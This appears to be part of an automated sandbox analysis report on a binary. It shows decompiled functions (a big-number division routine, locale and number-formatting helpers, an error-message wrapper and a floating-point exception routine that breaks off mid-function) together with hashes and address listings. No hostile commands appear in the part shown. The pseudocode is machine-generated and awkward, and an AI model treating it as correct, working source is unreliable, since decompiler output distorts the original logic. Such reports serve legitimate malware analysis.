                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: fe31d395dcd505c1085362a8f8a47995458b295dd442320774cc5a1cbad8d481
                • Instruction ID: cee2e3200db9de3a4afb1a7f53f039d54d1cc13267d7c1a940cef81eb9121193
                • Opcode Fuzzy Hash: fe31d395dcd505c1085362a8f8a47995458b295dd442320774cc5a1cbad8d481
                • Instruction Fuzzy Hash: 6831E47190024DAFCB248E78CC88FFA7BBDDB85358F1402ADF46AD7251E6309E458B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCC0B0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 90%
                			E00CCC0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00CBDDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00CD0DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00CBDDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00CBDDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xccd6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00CD0DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00CCAA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00CCAA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00CCAA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                0x00ccc0bc
                0x00ccc0bf
                0x00ccc0c3
                0x00ccc0cd
                0x00ccc0d0
                0x00ccc0d2
                0x00ccc0d4
                0x00ccc0e1
                0x00ccc0e1
                0x00ccc0e4
                0x00ccc0e4
                0x00ccc0e7
                0x00ccc0ea
                0x00ccc0ec
                0x00ccc21f
                0x00ccc221
                0x00ccc26a
                0x00ccc26e
                0x00ccc274
                0x00ccc223
                0x00ccc225
                0x00ccc228
                0x00ccc22a
                0x00ccc22d
                0x00ccc22f
                0x00ccc231
                0x00ccc265
                0x00ccc265
                0x00ccc265
                0x00ccc233
                0x00ccc238
                0x00ccc23e
                0x00ccc23e
                0x00ccc241
                0x00ccc243
                0x00ccc245
                0x00000000
                0x00000000
                0x00ccc247
                0x00ccc248
                0x00ccc24b
                0x00ccc24e
                0x00ccc250
                0x00000000
                0x00ccc252
                0x00000000
                0x00ccc252
                0x00000000
                0x00ccc250
                0x00ccc254
                0x00ccc25b
                0x00ccc25f
                0x00ccc263
                0x00000000
                0x00000000
                0x00ccc263
                0x00ccc266
                0x00ccc266
                0x00ccc268
                0x00ccc275
                0x00ccc278
                0x00ccc27b
                0x00ccc27e
                0x00ccc27e
                0x00ccc282
                0x00ccc285
                0x00ccc288
                0x00ccc28b
                0x00ccc296
                0x00ccc28d
                0x00ccc292
                0x00ccc292
                0x00ccc2a0
                0x00ccc2a5
                0x00ccc2a8
                0x00ccc2aa
                0x00ccc2b4
                0x00ccc2b7
                0x00ccc2be
                0x00ccc2c1
                0x00ccc2c4
                0x00ccc2cc
                0x00ccc2d2
                0x00ccc2d2
                0x00ccc2d2
                0x00ccc2d2
                0x00ccc2c4
                0x00ccc2d7
                0x00ccc2de
                0x00ccc2de
                0x00ccc2e1
                0x00ccc2e4
                0x00ccc516
                0x00ccc516
                0x00ccc2ea
                0x00ccc2ea
                0x00ccc2f0
                0x00ccc2f3
                0x00ccc2f6
                0x00ccc2f9
                0x00ccc2fc
                0x00ccc2ff
                0x00ccc302
                0x00ccc302
                0x00ccc305
                0x00ccc30c
                0x00ccc30c
                0x00ccc307
                0x00ccc307
                0x00ccc307
                0x00ccc30e
                0x00ccc312
                0x00ccc315
                0x00ccc317
                0x00ccc31a
                0x00ccc321
                0x00ccc324
                0x00ccc327
                0x00ccc332
                0x00ccc335
                0x00ccc33a
                0x00ccc33f
                0x00ccc346
                0x00ccc34b
                0x00ccc34d
                0x00ccc34f
                0x00ccc353
                0x00ccc356
                0x00ccc359
                0x00ccc361
                0x00ccc36a
                0x00ccc36a
                0x00ccc36c
                0x00ccc36f
                0x00ccc36f
                0x00ccc359
                0x00ccc379
                0x00ccc37e
                0x00ccc383
                0x00ccc385
                0x00ccc388
                0x00ccc38a
                0x00ccc38d
                0x00ccc390
                0x00ccc392
                0x00ccc395
                0x00ccc398
                0x00ccc39a
                0x00ccc3a1
                0x00ccc3a6
                0x00ccc3a9
                0x00ccc3b3
                0x00ccc3b5
                0x00ccc3b7
                0x00ccc3ba
                0x00ccc3ba
                0x00ccc3bc
                0x00ccc3bf
                0x00ccc3c2
                0x00ccc3c5
                0x00ccc3c8
                0x00ccc39c
                0x00ccc39c
                0x00ccc39f
                0x00000000
                0x00000000
                0x00ccc39f
                0x00ccc3cb
                0x00ccc3cd
                0x00ccc3cf
                0x00000000
                0x00ccc3d1
                0x00ccc3d1
                0x00ccc3d4
                0x00ccc3d6
                0x00ccc3d6
                0x00ccc3e4
                0x00ccc3e7
                0x00ccc3ec
                0x00ccc3ee
                0x00000000
                0x00000000
                0x00ccc3f0
                0x00ccc3f7
                0x00ccc3f7
                0x00ccc3fa
                0x00ccc3fd
                0x00ccc400
                0x00ccc403
                0x00ccc403
                0x00ccc406
                0x00ccc409
                0x00ccc40d
                0x00ccc410
                0x00ccc412
                0x00ccc415
                0x00000000
                0x00000000
                0x00ccc417
                0x00ccc415
                0x00ccc3f2
                0x00ccc3f2
                0x00ccc3f5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccc3f5
                0x00ccc41c
                0x00ccc41c
                0x00000000
                0x00ccc41c
                0x00ccc419
                0x00000000
                0x00ccc419
                0x00ccc3d4
                0x00ccc3cf
                0x00ccc41f
                0x00ccc41f
                0x00ccc421
                0x00ccc42b
                0x00ccc42b
                0x00ccc42e
                0x00ccc430
                0x00ccc432
                0x00ccc434
                0x00ccc439
                0x00ccc43c
                0x00ccc43c
                0x00ccc43f
                0x00ccc442
                0x00ccc445
                0x00ccc447
                0x00ccc45c
                0x00ccc45e
                0x00ccc460
                0x00ccc462
                0x00ccc464
                0x00ccc466
                0x00ccc468
                0x00ccc46a
                0x00ccc46d
                0x00ccc46d
                0x00ccc471
                0x00ccc473
                0x00ccc479
                0x00ccc47c
                0x00ccc47c
                0x00ccc47c
                0x00ccc480
                0x00ccc480
                0x00ccc485
                0x00ccc488
                0x00ccc488
                0x00ccc48d
                0x00ccc48f
                0x00ccc491
                0x00ccc498
                0x00ccc498
                0x00ccc49a
                0x00ccc49f
                0x00ccc4a1
                0x00ccc4a4
                0x00ccc4a4
                0x00ccc4a7
                0x00ccc4b0
                0x00ccc4b0
                0x00ccc4b2
                0x00ccc4b2
                0x00ccc4b7
                0x00ccc4bd
                0x00ccc4c1
                0x00ccc4c4
                0x00ccc4c7
                0x00ccc4c9
                0x00ccc4c9
                0x00ccc4c9
                0x00ccc4ce
                0x00ccc4ce
                0x00ccc4d1
                0x00ccc4d4
                0x00ccc493
                0x00ccc493
                0x00ccc496
                0x00000000
                0x00000000
                0x00ccc496
                0x00ccc491
                0x00ccc4db
                0x00ccc4db
                0x00ccc4dc
                0x00ccc423
                0x00ccc423
                0x00ccc425
                0x00000000
                0x00000000
                0x00ccc425
                0x00ccc4ec
                0x00ccc4f1
                0x00ccc4f4
                0x00ccc4f8
                0x00ccc4f9
                0x00ccc4fc
                0x00ccc4ff
                0x00ccc500
                0x00ccc503
                0x00ccc506
                0x00ccc509
                0x00ccc50c
                0x00ccc50c
                0x00ccc514
                0x00ccc51b
                0x00ccc51c
                0x00ccc51e
                0x00ccc520
                0x00ccc522
                0x00ccc525
                0x00ccc530
                0x00ccc530
                0x00ccc536
                0x00ccc536
                0x00ccc539
                0x00ccc53a
                0x00ccc53a
                0x00ccc530
                0x00ccc53e
                0x00ccc540
                0x00ccc542
                0x00ccc544
                0x00ccc544
                0x00ccc546
                0x00ccc54a
                0x00000000
                0x00000000
                0x00ccc54c
                0x00ccc54c
                0x00ccc54f
                0x00ccc551
                0x00000000
                0x00000000
                0x00000000
                0x00ccc551
                0x00ccc544
                0x00ccc553
                0x00ccc55d
                0x00000000
                0x00000000
                0x00000000
                0x00ccc268
                0x00ccc0f2
                0x00ccc0f2
                0x00ccc0f2
                0x00ccc0f5
                0x00ccc0f8
                0x00ccc0fb
                0x00ccc12c
                0x00ccc12e
                0x00ccc179
                0x00ccc17b
                0x00ccc182
                0x00ccc189
                0x00ccc18c
                0x00ccc18f
                0x00ccc195
                0x00ccc195
                0x00ccc196
                0x00ccc199
                0x00ccc1a0
                0x00ccc1a9
                0x00ccc1ae
                0x00ccc1b1
                0x00ccc1b6
                0x00ccc1b9
                0x00ccc1bb
                0x00ccc1c0
                0x00ccc1c3
                0x00ccc1c6
                0x00ccc1c6
                0x00ccc1c6
                0x00ccc1ca
                0x00ccc1cd
                0x00ccc1cd
                0x00ccc1d2
                0x00ccc1d2
                0x00ccc1dd
                0x00ccc1e8
                0x00ccc1e8
                0x00ccc1eb
                0x00ccc1f7
                0x00ccc1fc
                0x00ccc207
                0x00ccc209
                0x00ccc20b
                0x00ccc211
                0x00ccc216
                0x00ccc218
                0x00ccc21e
                0x00ccc130
                0x00ccc13c
                0x00ccc13c
                0x00ccc13f
                0x00ccc14f
                0x00ccc155
                0x00ccc15c
                0x00ccc15e
                0x00ccc166
                0x00ccc168
                0x00ccc16a
                0x00ccc16f
                0x00ccc172
                0x00ccc178
                0x00ccc178
                0x00ccc0fd
                0x00ccc100
                0x00ccc104
                0x00ccc10a
                0x00ccc119
                0x00ccc123
                0x00ccc12b
                0x00ccc12b
                0x00ccc0fb
                0x00ccc0d6
                0x00ccc0d9
                0x00ccc0df
                0x00ccc0df
                0x00ccc0c5
                0x00ccc0cb
                0x00ccc0cb

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                • Instruction ID: c0e3d4342fdec04adb3a552d091b5293d20c80a15c64039177aa15fc70a89dcf
                • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                • Instruction Fuzzy Hash: 25021C71E002199BDF14CFA9D890BADB7F1EF48314F25816ED929E7240D731AA41CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9D99, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CB9D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xcdd610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xcfde30 = _v304;
					 *0xcfde32 = 0;
					 *0xcdd610 = 0xcfde30;
				}
				E00CAF980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xcdd600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                0x00cb9db1
                0x00cb9dbf
                0x00cb9dcc
                0x00cb9dd4
                0x00cb9dda
                0x00cb9dda
                0x00cb9df0
                0x00cb9df5
                0x00cb9dfa
                0x00cb9e04
                0x00cb9e0e
                0x00cb9e16
                0x00cb9e21

                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CB9DBF
                • GetNumberFormatW.KERNEL32 ref: 00CB9E0E
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: 3afde1dafdd07f4c4bf5e9ac2b0aaa61b3345eeb300f6bf3b766020fbe8927cb
                • Instruction ID: ab1d8b700ac63e022c2d15df7a368e648b69f5ada122fb23289660bb0d1fec6a
                • Opcode Fuzzy Hash: 3afde1dafdd07f4c4bf5e9ac2b0aaa61b3345eeb300f6bf3b766020fbe8927cb
                • Instruction Fuzzy Hash: 30015A75540208AADB109FA4DC45FAFBBBDEF19710F104423FA099B260D3709925CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA6D06, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E00CA6D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                0x00ca6d06
                0x00ca6d0e
                0x00000000
                0x00ca6d35
                0x00ca6d27
                0x00ca6d2f
                0x00000000

                APIs
                • GetLastError.KERNEL32(00CB0DE0,?,00000200), ref: 00CA6D06
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6D27
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 01ecaf448fcccad2a981230e74498b128a8b7d200f08ab2dd11df4755859b8e6
                • Instruction ID: 2903246688bc7439a22cbe4842bc10c803e2083c5419c4cf41209cebcb25d909
                • Opcode Fuzzy Hash: 01ecaf448fcccad2a981230e74498b128a8b7d200f08ab2dd11df4755859b8e6
                • Instruction Fuzzy Hash: 99D0C971388303BEFA110B708D0AF2AB795B766B86F24C905B356EA0E0D670A014D629
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CD0654, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CD0654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00CCDFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
